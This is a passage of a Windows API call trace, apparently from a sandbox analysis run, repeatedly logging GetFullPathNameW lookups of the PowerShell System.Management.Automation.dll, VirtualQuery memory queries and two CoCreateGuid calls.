	[0318.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.082] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.083] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.083] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.083] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.084] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.085] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.085] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.086] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.086] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.086] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.086] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.086] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.086] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.086] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.087] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x65f63e75, Data2=0x8dc2, Data3=0x40e2, Data4=([0]=0xb1, [1]=0x1f, [2]=0x87, [3]=0x50, [4]=0x3, [5]=0x24, [6]=0x34, [7]=0x85))) returned 0x0
	[0318.087] VirtualQuery (in: lpAddress=0x28b900, lpBuffer=0x28c7c0, dwLength=0x30 | out: lpBuffer=0x28c7c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.087] VirtualQuery (in: lpAddress=0x28b900, lpBuffer=0x28c7c0, dwLength=0x30 | out: lpBuffer=0x28c7c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.087] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.088] VirtualQuery (in: lpAddress=0x28b900, lpBuffer=0x28c7c0, dwLength=0x30 | out: lpBuffer=0x28c7c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.088] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.088] VirtualQuery (in: lpAddress=0x28b900, lpBuffer=0x28c7c0, dwLength=0x30 | out: lpBuffer=0x28c7c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.088] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.088] VirtualQuery (in: lpAddress=0x28b900, lpBuffer=0x28c7c0, dwLength=0x30 | out: lpBuffer=0x28c7c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.089] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.089] VirtualQuery (in: lpAddress=0x28b900, lpBuffer=0x28c7c0, dwLength=0x30 | out: lpBuffer=0x28c7c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.089] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.089] VirtualQuery (in: lpAddress=0x28b900, lpBuffer=0x28c7c0, dwLength=0x30 | out: lpBuffer=0x28c7c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.089] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.089] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.090] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.090] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.090] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.090] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.090] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.090] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.090] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xf958403b, Data2=0xe68, Data3=0x47e3, Data4=([0]=0x9f, [1]=0xf5, [2]=0xfe, [3]=0xe8, [4]=0x98, [5]=0xaf, [6]=0xb1, [7]=0x3d))) returned 0x0
	[0318.091] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.091] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.091] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.091] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.091] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.091] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.091] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
